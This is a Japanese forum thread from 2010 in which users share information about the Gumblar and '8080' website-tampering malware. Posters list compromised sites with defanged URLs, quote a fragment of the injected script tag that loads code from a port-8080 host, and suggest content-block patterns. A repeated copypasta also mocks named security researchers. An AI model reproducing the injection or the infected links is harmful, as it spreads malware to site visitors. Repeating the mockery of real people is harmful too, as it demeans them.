- Frigate 3.36
- FTP Commander 8
- FTP Navigator 7.77
- FTP Now 2.6.93
- FTP Rush 1.1b
- SmartFTP 4.0.1072.0
- Total Commander 7.50a
- UltraFXP 1.07
- WinSCP 4.2.5

上記に加えて、以下の Web ブラウザのアカウント管理機能を用いて保存され
ている情報をマルウエアが窃取し、外部サーバに送信している事を確認しまし
た。

- Microsoft社 Internet Explorer 6
(Internet Explore 7 および 8 ではアカウント窃取は確認されておりません)
- Opera社 Opera 10.10

opera-!!!!

>>714
ほとんどダメポってことねｗ

>>714
もうFTPって規約を使うなということか…。
あとIE6のオートコンプリートｗ

IE6なんか早く捨てればいいのに、官庁の電子入札システムは
IE6以外じゃ動作しないとかなんとか…

つかWebスペースを提供してくれる会社でFTP駄目(代わりにCMS使え)ってトコ無いの？
自分が調べた限りでは無料の会社はFTP使えってトコがほとんどだったような…

あ、ブログとかは別ね。

フリーライダーの厚かましさはホント底無しだな。

昨日チカッパからFTPS対応したってメール来た。
ttp://chicappa.jp/?mode=info&state=info&page=1&id=492#492

ロリポはとりあえず放置で行くみたい。

●全世界にウ○ツキ評価を公表している機関の会議に参加する
10万人以上の従業員を有しているAIG（アメリカンインターナショナルグループ：
アメリカ合衆国ニューヨークに本拠を置く保険会社）Europeの
おそらく社内セキュリティ担当かなんかの人
http://www.virusbtn.com/conference/vb2009/programme/index

Martin Overton さん

2009年9月ジュネーブ会議にて

CMSでもリスクに差はほとんどないでしょ？
個人的には、近いうちにCMSのコンテンツ改竄に踏み切る気がしてるｗ
サーバー側はポートの制限がしにくいし
話は少し違うけどCMS自体に重大なセキュリティホールが見つかったら、FTPよりリスクは大きいし
これはFTPサーバーにセキュリティホールが見つかる事と同等かもしれないけど
性質上CMSの方がセキュリティホールが見つかりやすい気がする

●全世界にウ○ツキ評価を公表している機関の会議に参加する
10万人以上の従業員を有しているAIG（アメリカンインターナショナルグループ：
アメリカ合衆国ニューヨークに本拠を置く保険会社）Europeの
おそらく社内セキュリティ担当かなんかの人
http://www.virusbtn.com/conference/vb2009/programme/index

Pascal Lointier さん

2009年9月ジュネーブ会議にて

フリーのスペースは基本放置でいくんだろうなぁ

>>718
GeoCitiesがCMSだった気が。
んで文字コードがEUCでしょっちゅう化けた気が。

>>722
そんなん昔からあるべ。SQLインジェクションとやること大して変わらんし
WordPressとかしょっちゅうやられ(て頻繁にバージョンアップし)てる。

>>714
Firefox圧勝だな

Firefoxは2007年からのパスワード漏洩の脆弱性を放置しているがな

>>725
スレ違い、むしろ板違いｸﾚｸﾚの相手しないでほしい

>>714
だからマスタパスワード入れろとあれほど

ひょっとしてwebの書き換え止まった？

16 名前： 砂鉄(富山県)[sage] 投稿日：2010/02/03(水) 17:07:11.57 ID:AJ6wgOKE
operaのコンテンツブロックにhttp://*.ru*を入れればガンブラァを防げるという話を聞いたことがあるな

FirefoxでFireFTPこれ最強

>>732
どこのコピペか知らんが、コンテンツブロックに入れるなら *:8080/* の方がいい。

●全世界にウ○ツキ評価を公表している機関の
会議に参加するシマンテックの面々
http://www.virusbtn.com/conference/vb2009/programme/index
Sumesh Jaiswal
Carey Nachenberg
Vijay Seshadri
Zulfikar Ramzan
Candid Wueest

2009年9月ジュネーブ会議にて

IEの情報を盗んで被害が出るまでは対応策が出ないということは
今までは人のパソコンの中身をこそっとみてウヒヒと笑って個人利用していた
可能性もあり？

>>718
fc2がCMSとFTP両用

>>729
あ、ごめん。下まで読まずにレスってしまった。

>>736
ないとはいえないね

p://www●naughty-skt●com/

再改竄。

>>714
DreamweaverのFTPは安全か
SFTPだし

また火狐野朗がなんかいっちゃってんのか
そんなもんなんでもないとはいえないってなるわ

>>741
相手サーバーがSFTPならな

>>742
疲れてるならとっとと寝ろよ

某ブログの転載の転載。規制中らしいよ


>某掲示板に書こうと思ったら、巻き込み規制を喰らっていたので･･･

>・海保エミリ(公式サイト)
>tp://emilykaiho●com/en/home●html
>tp://emilykaiho●com/home●html
>※stardustの連鎖と思われます

某ブログつながりで…記事にされてるOperaですけどマスターパスワード掛けとけば一応は安心じゃないですかね？

そもそも引っかかってからの話とか
気にするな
ftpはともかく

tcnweb●ne●jp/~pinkysky/
www●eonet●ne●jp/~inoue-clinic/
www●fujiya-ryokan●jp/index●html
www●popchai●jp/

ゴーギャン展のＨＰ改ざん　ガンブラー亜種

東京国立近代美術館で昨年開催された「ゴーギャン展２００９」の公式ホームページが、
「ガンブラー」と呼ばれるコンピューターウイルスの亜種に感染し、不正に改ざんされていたことが、３日分かった。

同展を主催したＮＨＫなどによると、不正に改ざんされた期間は、今年１月３日から２月１日まで。
この期間に延べ約１７００件の閲覧があり、アクセスした人のパソコンにウイルス感染のおそれがあるという。

ttp://www.nishinippon.co.jp/nnp/item/150424

>>748
ずいぶんと訪問者が少ないサイトなんだな・・

>>740
ろりぽ

>>745
whoisからめるぽ

>>747
下二つはさっきめるぽとwhoisからめるぽしてますた。
残件上二つ。

>>747上二つ。
whoisからめるぽ
めるぽ

//godiego●net/
すみませんここトロイの木馬が検出されたんですが
ガンブラーにかかってますか？

>>753
http://www.aguse.jp/?m=w&url=http%3A%2F%2Fgodiego.net&x=0&y=0

//godiego●net/common/flash.js
がやられてる

>>754
ありがとうございましたやっぱりかかってるみたいですね　

>>755
ありがとうございます。
ゴダイゴすれみたら1月18日にトロイが出たって書いてた人が
いたので・・・

>>753
>>16
・Gumblar Checker 2
移転先URL→ ttp://gumblar.s1.dynamitelife.net/

>>745
ttp://www.stardust.co.jp/profile/kaihoemily.html
「前科あり」だから、問い合わせフォームから凸しといたw

>>753
whoisからめるぽ

>>758
乙です。

見落とし
>>694
乙乙です。

whoisカラめるぽ？
何語だよ・・・

ロリポもFTPSに対応予定らしい。
現状は.ftpaccessを置いて対応しれだって。

ttp://lolipop.jp/gumblar/
ttp://heteml.jp/gumblar/

>>760
お前ここは初めてか？力抜けよｗ

ユーザ名とパスワード盗まれてる時点でFTPoverSSLは意味ないんじゃないの？

自端末で改竄するんだよね？
.ftpaccessでIP制限だと無意味だよね

こっそりぬるぽしてみる

>>765
ｶﾞｯ!!

>>714
予想はしてたが、主要ソフト壊滅状態か。NextFTPも多分アウツじゃない？
FFFTPだけ悪者にされてｶﾜｲｿｽ
でもブログやニュース記事には残るわけで・・・
何がアルファブロガーだ、ロクに考えもせず糞記事撒き散らしやがってライフハッカーが

--------

250 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2010/01/30(土) 17:26:00
フリーFTPソフト『FFFTP』に、8080系のマルウェア感染と同時にID・パスワードを取得される危険性があるそうです : ライフハッカー［日本版］, 仕事も生活も上手くこなすライフハック情報満載のブログ・メディア
ttp://www.lifehacker.jp/2010/01/100130ftpffftp8080id.html

> 「UnderForge of Lack」では、消去すべきレジストリを記載してありますので、『FFFTP』のユーザーさんは、参考にして下さい。
ttp://www3.atword.jp/gnome/2010/01/28/hammmer-and-anvil-a-blacksmith-in-the-dark/

> 代わりのFTPソフトとしては、『ALFTP』、『WinSCP』、有料ですが『NextFTP』（3ヶ月間の無料試用期間あり）などをどうぞ。

--------

書くネタが出来て良かったね、さっさと記事書けよアルファブロガーさん

FFFTPだけが悪いような書き方を最初にした所が悪い。
そしてFFFTP作者もまんまと騙されてアホみたい。

ライフハッカーはレベル低いぞ
２ちゃんの平均より低いだろ
子供のいたずら書き程度だ

FFFTP作者は騙されたってより責任を取りたくないから
ちゃんと他に移行してって言ったもんっていう
証拠を示しただけだろ

>>768
FFFTPが対象になってるって記事を
勝手にFFFTPだけと読み取ったんじゃねえの
お前みたいなおっちょこちょいが

責任なんてとる必要無いだろww
FFFTPに問題がありパスワード等が漏れた訳では無い

それを言うならウイルスが実行出来てしまうようなOSを作ったマイクロソフト（ry

Adobe,Sunかわいそす

>>771
知らないやつは黙ってろｗ

>>772
単に問い合わせが多かったんだろ

>>773
おっちょこちょいは黙ってろ

今日も元気でよろしい。

どう考えてもウイルスの作者が責任をとるべきだろ
これはまず無理

何で作者は捕まらないのかな…。

技術の進歩のため

独自のブロードバンドサプライヤーとして自分ちで立ち上げているからじゃね
もう今時はね

www●seihuu●com
ソース見ただけじゃ改ざんされてるか分からん…。
avastがなぜか検出する

銃は悪くない。使う人が悪い。
ウィルスは悪くない。DL実行できてしまうアプリが悪い。

>>782
言いたいことを例えるための例と言いたいことが矛盾。

銃は悪くない。銃で犯罪を行うことが出切る人間が悪い。
ウィルスは悪くない。DL実行できてしまうアプリが悪い。

銃は悪くない。使う人が悪い。
ウィルスは悪くない。DL実行する人が悪い。

銃は戦争の道具として作られたんだけどな

ウイルス作者はなぜ捕まらないのか？(上)
ttp://wiredvision.jp/archives/200201/2002012101.html
ウイルス作者はなぜ捕まらないのか？(下)
ttp://wiredvision.jp/archives/200201/2002012207.html

もうそうなっちゃうと、一般主婦が自発的に検体を送ることがないように
警察当局が作者を自発的に捕まえようなんてないすからね。
ベンダーが自発的に捕まえる権限もないす。
この3者が相互に働きかけがない限り永遠にないすね。

>>781
index.htmに/*LGPL*/

>>781
<script src="http://省略:8080/G先生/G先生/FeDex/うｐろだ/うｐろだ/" id="N7vcg6m1vyt" type="text/javascript" defer="defer">
</script>

その先は死亡

aguseさんは「Trojan-Downloader.JS.Pegel.b」だと仰ってます。

他国に仕掛けるならブロードバンドサプライヤーを立ち上げやすい都合上で中国ロシアが適当。
ちょろっと銀行個人情報抜きニュイルスとか偽コーデックや偽セキュリティソフトをまく程度なら北米・ブラジル。
この傾向で決まりですわ。

ちょっと質問いい？
Part2から読んでるんだけど、ちょっと混乱してきた
今回はFFFTPのレジストリのように、設定ファイルからIDとパスが盗まれてるわけで、そこにSFTPとかを利用しても通信が暗号化されるだけでIDとパスを保存したら意味ないんじゃない？
それともパケットが盗まれた時の対策のためにSFTPを利用しろって言ってるの？
対策を聞いてると重要度としては、SFTPにする＞IDとパスを保存しない　のように見えるんだけどちょっと違う気がするんだよね
まさか＞じゃなくて＝だとか？

>>790
カスペルが自国からまいてるとか思ってるの？
イの一番に疑われるような「ゆとり」じゃねえよ。

>>790
感染しないことが一番
全てのプラグイン切っとけ

サイト管理用PCのように分けるのも吉

?

>>790
FTPS使おうがSFTP使おうが、
PC内にID、パスワードが保存されていれば意味ないね


SFTP使えるなら、まずID、パスワードは使わない
過去使っていたら、それらの痕跡をレジストリなどを含めて削除する
SFTPは公開鍵認証を使い十分長い推測されないパスフレーズを使う

ただし、既に感染している場合、秘密鍵を持って行かれた上で
パスフレーズもキーロガーで持って枯れる可能性があるが

>>790
SSH 使ってるから大丈夫。
でも、>>287 になったら大問題。
あとはぐぐってね。

感染してから設定ファイル読んでパス盗まれるって話だろ

感染感染って感染しなけりゃおｋだろ

公共機関がwinｎy使う時の注意とか配布するのを連想させる
使うのをやめろっていう

まあ、もしそうなら賞賛目的に他ベンダーが密告するとか
まあ俺ならそうするね。

子供の思惑程度で白黒が決まるならブッシュマン村の村長ぐらいにはなれるでしょうな。

?

ワードサラダですね、わかります

>>781
めるぽ

　　　　　　 ＿
┌――─┴┴─――┐
│　セルフサービス　.│
└―――┬┬─――┘
　 　 　 　 ││　　 .／
　　　　 　゛゛'゛'゛　／
　　　　　　　　 ／
　　　　 | ＼／
　　　　 ＼　＼
　　　　　　＼ノ

ｶﾞｯ はセルフサービスになりました。

使用方法は以下のようになります
　　　　 ∧
　　ｶﾞｯ< 　>＿∧
＝　()二)Ｖ｀Д´）＜ぬるぽ
　　　　＼ヽ ﾉ　）
　　　　ﾉ(○´ノ
　　　（＿ﾉ（_＿）

尚、使用方法を誤ると、最悪の場合、命を落とす危険性がございますので、
初めてご使用される方は、各都道府県に設置してある専門の窓口にご相談下さい。

財団法人 全日本 ぬるぽｶﾞｯ セルフ振興会

>>781
> Delivery Status Notification (Failure)
略
> Technical details of permanent failure:
> DNS Error: Domain name not found

届かないメアド。。。
かごやにもめるぽ

>>803
予知能力者でぷか。

>>781
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>401 Authorization Required</TITLE>
</HEAD><BODY>

かごやで対処したのかな？

>>781,>>805
かごやからめる北お。

>>806
ｋｗｓｋ

KR-1はいいバイクだった。


>>807
ユーザーに連絡したとのこと。

>>808
対応乙

GumblarはAdob？ Readerのバグ
わざわざGumblarとかいう略称を付ける必要ない
フルネームで「GumblAdob？Reader」と呼び今後もAdob？を疑うことを忘れるな

なにそれこわい

Internet Explorer の脆弱性により、情報漏えいが起こる
公開日: 2010年2月4日 | 最終更新日: 2010年2月4日
ttp://www.microsoft.com/japan/technet/security/advisory/980088.mspx

来たよん

危ないのはIE6だけじゃなかったのね

>>812
このサイト初めて知った

>>792
まぁ感染しない事が一番だよね。対策頑張ります
やっぱりJavascriptとかプラグイン自体を切った方が良いんだよね
FirefoxにはNoscript導入してるから大丈夫だけど、Chromeには何も対策してないなー。ちょっくらJavascript切ってみるか

>>794、>>795
調べてみたらSFTPって公開鍵認証出来るんだね。なるほど。これなら秘密鍵が流出しなければ大丈夫だね
SFTPとかそういうのって単に通信を暗号化するだけなのかと思ってたｗ
確かにこれなら8080に対する対策としては有効だ。秘密鍵まで持っていかれたら終わりだけどｗ

一応調べてから質問したつもりだけど、ワード追加してみたら簡単に情報が出てきた。どうやら自分の調べ方が悪かったようです。お騒がせしてすみません

【速報】Vectorが節分に豆まきならぬウイルスばら撒いている模様
ttp://www.yukawanet.com/archives/2272566.html

>>812
Opera総合スレでは、これはJPCERT/CC報告のものとは関係ないと主張している人がいる。
実際のところどうなのか詳しく解説できる人はいない？

>>816
exeファイルを生成するからウイルスとして誤検出する

朝青龍は朝鮮系の血が入ってるから日本人じゃ太刀打ちできない程の強さだったが・・・・
寂しくなるな

>>816
誰が、至急この問題に対処すべきかは明らかだ

>>818
どうだろう

swf2exe 1.07（Vectorのライブラリからダウンロードできるもの）
ttp://www.virustotal.com/analisis/d45ce29dbc5fadd19a8ee51c85704047d01a42083e0ded0a49c6a19e270b610b-1265274284
swf2exe 1.08（Vector内にある作者個人ページからダウンロードできるもの）
ttp://www.virustotal.com/analisis/a3f6872e66e4416ae80e56e4b17bf4212e2194eb706bdf9bd495916fa4863e15-1265274605

誤爆だろ
怪しいトリックを使っている疑惑

また火狐がなんかいっちゃってんの

>>821
>ウィルス誤認に関しては少し前にupx圧縮を用いてファイル容量を圧縮していた時期に多く報告されていたので止めていました。
>ただ、ソフトウェアの仕様上、exeファイル内部に更にexeファイルの構造があるのでやはりウィルス対策ソフトによっては
>誤認されてしまうことがあるようです。
>ちなみに、私がソフトウェアを公開するときにはavast! anti virus(http://www.avast.com/index_jpn.html)を用いてスキャンをした上で公開しています。

作者が誤検出だと言ってる

>>824
なるほど、掲示板で答えてるのか
�dクス

えっ avast!5でWin32:Malware-genとして検出される藁
その作者はスキャンなんかしてねーダロ

えっ

誤爆

>>826
＞[18] Re:swf2exe　Name：みどるべあ　Date： 2009/11/15(Sun) 16:53
＞Date： 2009/11/15(Sun) 16:53

Gumblarと何か関係でも？

ttp://anubis.iseclab.org/?action=result&task_id=16614f204173bf71409bb63f3cff59177&format=html

>【速報】Vectorが節分に豆まきならぬウイルスばら撒いている模様
豆が欲しいって言ったら
鳩ぽっぽじゃん。

誤検出かどうかも自分じゃ確認できない低脳が喚いてるだけか

Windows98買ってから全然ウイルスにかからないと思っていたらIE4だからだったのか

PDF-XChange ViewerやFoxit Readerだと安心？(各ソフトのJavaScript無効で)

安心かと聞かなきゃわからないようなレベルの人には
安心ではないと返すしかない

PDF-XChange ViewerにもJavaScript機能あったのか

>>792
今一番恐れてるのは、Gumblarの類がConfickerみたいな
ネットワークウイルス機能を持つことだ。

そうなると、管理PCを分けてもダメなケースがあり得る。
同一ネットワーク上にある端末が全てやられる。

もちろん、完全にネットワークを分離したり、パッチを当てたり
PFW使ったり脆弱なパスワードを使っていなければ問題ないけど、
万が一1台でも対策が漏れてる端末があればアウト。

>>838
少なくともGumblar.xの時点で同一ネットワーク上は拾われてたよ
8080系はわからんけど

>>839
それはあくまでFTPのパケット盗聴だろ？
そうじゃなくて、ネットワーク経由で感染を広げる機能のことをいっている。

石橋を叩いても渡らない状態か・・・

>>840
ごめん＞＜

インターネット経由だとルーターでブロックされるからブラウザから侵入するぐらいしか方法がないけど
一度侵入されるとそこはLANの内部
つまり

クライアントは変なサービスを公開するなよ
この際SMBもoffでおｋだろ・・・

ウイルスが感染されていると思われるサイト?につないでしまったのですが、これは絶対に感染してしまっているのでしょうか？

どうでしょう？
上半身裸になって口あーんってしてみてもらえますか

まずは思いつくだけの確認をすべて行ってみましょう。

Acrobat Readerという公害にしとけば確認不要

FFFTPは簡単な暗号化でパスワードを保存してたってことは
暗号を解いてからパスワードを送信してるってこと？

>>849
そらそうだ。

なんだよここ中高女子しかいねーのかよ

8080系が絶賛活動中の中、Gumblar.xが再降臨なされた模様…

2010年2月 「Gumblar.x」の改ざん攻撃再開
ttp://blogs.yahoo.co.jp/noooo_spam/59488040.html


デヴィ夫人…(´・ω・｀)

>>852
今までGumblarや8080でブログの改竄ってあったっけ？
もし、Gumblarならブログにもログインし始めたと思っておｋ？

この改竄がどのように行われたかが気になる
仮にアカウントが盗まれたなら、少し前にあったアメブロの情報漏えいが絡むのか、それともGumblarによる不正取得なのか
仮ににアカウントが盗まれたとしても、ブラウザからの編集でjavascriptが使えるのか？
有料サービスか、著名人用の場合、カスタムヘッダー作成か何かで使えるのかな

とりあえず、今さっきアカウントとってみたけど、
無料アカウントだとjavascriptは使えないっぽいんだけど

>>853
改ざんされてるのはTOPページなだけで、ブログは関係ないぞ
ブログはアメブロだが、TOPページは別の会社のサーバだからｗ

アメブロはサイドバーでJavaScript使えるね

>>854
ぶーーー
夫人のオフィシャルサイトだったのねｗ
サンクスです！

ロリポFTPS対応。

FTPS対応してもIDパス取られてたら
支那クラッカーがそのIDでFTPSで安全に通信するだけ

キーロガー食ってたアウトだけど脳内パス保存が一番いい気がしてきた

早い話サイトを更新するたびにOSをクリーンインストールすればおｋ

>>860
1CD linuxでおｋ

ポストイットに ID、Pass 書いてモニタにペタッ！！が最強なのか・・・ orz

>>862
個人レベルならそれでいいんだけどな。
企業とかじゃセキュリティポリシー上そういうのはダメ。
ソーシャルハックの対象になりかねず、違う意味で脆弱性になるから。

Gumblerとあんまり関係ない話ですまん。

>>863
それくらいわかった上でのネタだと思うぞｗｗｗ

本人にしか分からない方法で書けばOK

元のテキスト-UTF8>-xor>-base91>-モールス信号>音声
ハハッ、ここまですれば本人しかわからないｗｗ

一番多いのがKBの裏ｗ

●全世界にウ○ツキ評価を公表している機関の（おまけにそれもトップページ）
会議に参加する小学校の児童カウンセラーとして立派に再起を果たして学校のホームページにも名前が掲載されている
シマソテックの面々

■http://www.virusbtn.com/conference/vb2009/programme/index
*Sumesh Jaiswal　←スポークスマンぽい！？
ほいじゃあ印をｼﾞｶﾘﾝで（微笑）
ttp://www.symantec.com/content/ja/jp/home_homeoffice/images/microsites/nis_nav/awards/microsite-vb100-award.gif
*Carey Nachenberg　←検出技術を開発したりなど技術畑の人（その後、労務に上がれないと見るや本執筆で老後資金ゲットだぜ!?）
↑よそがまず検出率に重点を置いていた頃にサボタージュ。今に至っても未だにツケが清算し切れぬ十字架サボタージュ。
*Vijay Seshadri
*Zulfikar Ramzan　→超注目！！★現Architect and Technical Director職★
→顔（ｼﾞｶﾘﾝ） ttp://www.symantec.com/content/en/us/about/bios/images/large/zulfikar_ramzan_lg.jpg
*Candid Wueest　←ｸﾞｸﾞﾙと（記述: Candid Wueest）といっぱい出てくる人　
→顔（当日の当人） ttp://www.virusbtn.com/images/conference/2009/photos/Anoirel_Issa/VB2009_AI_Dsc03315_med.jpg
（ネクタイスーツで昼間から飲むお呼ばれの酒はサイコーだぜ）

2009年9月ジュネーブ会議にて

●全世界にウ○ツキ評価を公表している機関の
会議に参加するIBM

Martin Overton さん

●全世界にウ○ツキ評価を公表している機関の
会議に参加する10万人以上の従業員を有しているAIG Europe
（アメリカンインターナショナルグループ：アメリカ合衆国ニューヨークに本拠を置く保険会社）
の、おそらく社内セキュリティ担当かなんかの人

Pascal Lointier さん

（Rev.8）ノートン警察（）笑　http://www.youtube.com/watch?v=FnEYTf3zyMk

>>866
復号できなかったらどうすんだｗ

>>869
誰か作ってｗ

誰かに作ってもらうなんて・・・極秘で自分独自仕様にしないと意味がないんじゃ

むしろ、>>866で公表してるからダメｗ

音声はミクで代用できるね

>>866
復号の順番を忘れて復号できないに可能性が

誰もうｐしないのでおいらがアップロードしてみた（´・ω・） ｽ
ttp://labs-uploader.sabaitiba.com/virus/download/1265358801.mp3
PASS:virus

これなら8080系に感染しても大丈夫！！

で、安全はFTPソフトは？

日本語おかしいですよ

>>875
それをどうしろと…

>>878
なんのファイルだったの？

ウイルスでした

>>879
>>866の無茶なパスワード保存案を具現化した物

モールス信号の時点で俺には手の打ちようがなかった

virusと思って提出しちまったじゃねーかｗ

送る前に中身確認しろよ…

なんという誤爆・・・

すっかり馴れ合いスレに成り下がったな

=================ここまで馴れ合い=================

引っかからないから提出したんだろがボケ！
そもそもPassがvirusなのが悪い

ちょっとすいません、１８時ちょうどにパソコンから蛍の光が流れだしたのですが
これってなにかのウイルスですか？

virusじゃなくてinfectedにしろよｗ

>>889
恐らく蛍がPCの中に入っています
そのPCは諦めて蛍の光観賞用にしましょう

エサもちゃんとあげてくださいね

エサは金魚のやつでいいですかね

蛍の育て方を教えてもらえるスレと聞いて

蛍も原子力発電だからウランを食べるよ

みなさんとてもセンスがいいですが
ネタじゃなくて本当にあの下校時に流れる蛍の光が流れてきたんです
怖いなと思って検索してみたけどわからなかったので
ここならウイルスの達人がいっぱいいると思って書き込みしてみました

こっちでやれ

http://gimpo.2ch.net/test/read.cgi/natsudora/1235231886/

●全世界にウ○ツキ評価を公表している機関の（おまけにそれもトップページ）
会議に参加する小学校の児童カウンセラーとして立派に再起を果たして学校のホームページにも名前が掲載されている
シマソテックの面々

■http://www.virusbtn.com/conference/vb2009/programme/index
*Sumesh Jaiswal　←スポークスマンぽい！？
ほいじゃあ印をｼﾞｶﾘﾝで（微笑）
ttp://www.symantec.com/content/ja/jp/home_homeoffice/images/microsites/nis_nav/awards/microsite-vb100-award.gif
*Carey Nachenberg　←検出技術を開発したりなど技術畑の人（その後、労務に上がれないと見るや本執筆で老後資金ゲットだぜ!?）
↑よそがまず検出率に重点を置いていた頃にサボタージュ。今に至っても未だにツケが清算し切れぬ十字架サボタージュ。
*Vijay Seshadri　←只のカバン持ち!?
*Zulfikar Ramzan　→超注目！！★現Architect and Technical Director職★
→顔（ｼﾞｶﾘﾝ） ttp://www.symantec.com/content/en/us/about/bios/images/large/zulfikar_ramzan_lg.jpg
*Candid Wueest　←ｸﾞｸﾞﾙと（記述: Candid Wueest）といっぱい出てくる人　
→顔（当日の当人） ttp://www.virusbtn.com/images/conference/2009/photos/Anoirel_Issa/VB2009_AI_Dsc03315_med.jpg
（ネクタイスーツで昼間から飲んじゃうお呼ばれの酒はサイコーだぜ）

2009年9月ジュネーブ会議にて

●全世界にウ○ツキ評価を公表している機関の
会議に参加するIBM

Martin Overton さん

●全世界にウ○ツキ評価を公表している機関の
会議に参加する10万人以上の従業員を有しているAIG Europe
（アメリカンインターナショナルグループ：アメリカ合衆国ニューヨークに本拠を置く保険会社）
の、おそらく社内セキュリティ担当かなんかの人

Pascal Lointier さん

（Rev.8.1）ノートン警察（）笑　http://www.youtube.com/watch?v=FnEYTf3zyMk

http://gumblar.s1.dynamitelife.net/gumx/
Gumblar.Xのチェッカーを作ってみた

xで足りるの？aからagまであるよ
ttp://www.kaspersky.com/viruswatchlite?search_virus=Gumblar
GPLとLGPLとExceptionでPegel
大方のDEBUG型はbに吸収されたことは確認済み
ttp://www.kaspersky.com/viruswatchlite?search_virus=Pegel

>>900
このスレでの分類は
ttp://www.so-net.ne.jp/security/news/newstopics_201001.html#04
を使ってる人が多くて、カスペの命名を厳密に使ってる人は少ないと思う

糞チェッカーは糞

>>899 乙です。
Dewi Sukarno ― デ○ィ夫人オフィシャルサイト(たぶんGumblar.X)
ttp://www●dewisukarno●co●jp/

ttp://www.virustotal.com/jp/analisis/ac2da817bb79c9ae652878e5345dd327ef6ce3c99f8b962719ee76bd037a8fb9-1265379913
結果: 0/40 (0%)

誰か凸ヨロ･･･

いや…そのファイルスキャンしても意味ないだろ。
scriptタグ1行しか書いてないんだし。

Gumblar(.x)が復活したから
Gumblarと8080系を明確に区別しないといかんね。

↓次スレのテンプラに入れてくれ↓

【Gumblar】混ぜるな危険【8080系】

■Gumblar(たぶん消滅済)
2009/4〜6に猛威を振るったやつ。
GENOの対応の悪さが「GENOウイルス」という言葉を生み出した。

■Gumblar.x (祝・復活)
2009/10〜12に出現。
挿入するコードが Gumblarのそれと同じだった為、
Gumblarの進化型(亜種？)と言われている。
※今後の動向には注意が必要。

■8080系(GNU GPL、CODE1、LGPL、Exception、DEBUG、.ru:X)
Gumblar.x が消滅した直後に出現し、今現在も猛威を振るっている。
※セキュリティソフト依存の防御は非常に危険。

>>905
自分が立てるなら >>2 あたりの最初のほうに入れるつもりだが
どうなるか分からんので次スレ立てる人には
>>5 と >>10 の感染確認の修正↓または廃止と
○　C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\スタートアップ\siszyd32.exe
×　C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe

>>9 は少々危険なので廃止の方向でお願いしたい

あと、ここが実質4スレ目だから次スレは5でいいよな？

>>906
それなら今、テンプレ修正した方がよいと思いますが

>>7のタイトルもGENOではミスリードに繋がるので変えて欲しい

>>906
自分も今テンプレ案練っといた方が良いと思う

まず>>1
改ざんされたWebページを経由して感染するウイルスの情報・対策スレです

ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください

現時点でGumblar(GENO)、8080(『/*LGPL*/』『/*GNU GPL*/』『/*CODE1*/』)
JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう

＊＊＊ 危険と思われるサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ＊＊＊
＊＊＊ 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ＊＊＊

【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】実質4スレ目
http://pc11.2ch.net/test/read.cgi/sec/1263865118/
【関連スレ】
GENOウイルススレ　★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/

GENOは商標だし
ファイルが有るかだけで判断すると無ければ安全と思うだろう

↓のサイトがAvastで反応するんだが…？

ネット銀行比較.com
ttp://www●jygboc●com/

【Gumblar/GENO】Web改竄ウイルス総合スレ5【8080】
http://pc11.2ch.net/test/read.cgi/sec/1265387369/

勝手に立てたやつがいるな
今回はテンプレ練ってから新しく立てようぜ

よかったらテンプレ案を貼るが
どうする？

>>2
の変更は？どうする

>>915
宜しくですー。

>>912
ソース見たけど感染してるっぽいね

>>917
じゃ、9レス分になるが今から貼る
おかしなところがあったら修正よろ

【Gumblar/GENO】Web改竄ウイルス総合スレ5【8080】

改ざんされたWebページを経由して感染するウイルスの情報・対策スレです

ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください

現在、メディアでガンブラー(の亜種)と紹介されている8080系が流行しています
最近のウイルスは短期間で亜種が発生するので
ウイルス対策ソフトだけに依存するのは危険です
対策として使用しているソフトウェアのセキュリティ・アップデートが有効です
基本的なことですが効果的な対策ですのでアップデートは欠かさず行いましょう
（テンプレの【脆弱性を利用されやすいソフトウェア】参照）

★★★ 危険と思われるサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ★★★
★★★ 危険なサイトが貼られる場合がありますのでURLは安易にクリックしないでください ★★★
★★★ 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ★★★

【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】(実質4)
http://pc11.2ch.net/test/read.cgi/sec/1263865118/
【関連スレ】
GENOウイルススレ　★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/

【Gumblar】混ぜるな危険【8080系】

■Gumblar(たぶん消滅済)
2009/4〜6に猛威を振るったやつ。
GENOの対応の悪さが「GENOウイルス」という言葉を生み出した。

■Gumblar.x
2009/10〜12に出現。
挿入するコードがGumblarのそれと同じだった為、
Gumblarの進化型(亜種？)と言われていた。
Gumblar.xは12月中旬にコードごと消滅、以後追跡不能。
※残骸が残っているサイトがあるが、現在は基本的に無害。

■8080系(GNU GPL、CODE1、LGPL、Exception、DEBUG)
Gumblar.xが消滅した直後に出現し、今現在も猛威を振るっている。
※セキュリティソフト依存の防御は非常に危険です。

8080系は、Gumblar用の対策方法には載ってない
「Java(JRE)」の脆弱性を突いているので、Gumblarと8080系を混同して
Gumblar用の対策を施し、「これで大丈夫(ｷﾘｯ」とか言ってると、
踏んだ地雷が爆発→→→　＼(＾o＾)／オワタ　なんて事に(なるかも？)

【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です

■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
　ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする (他社製のPDF Readerでもオフにする)
　編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意！)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
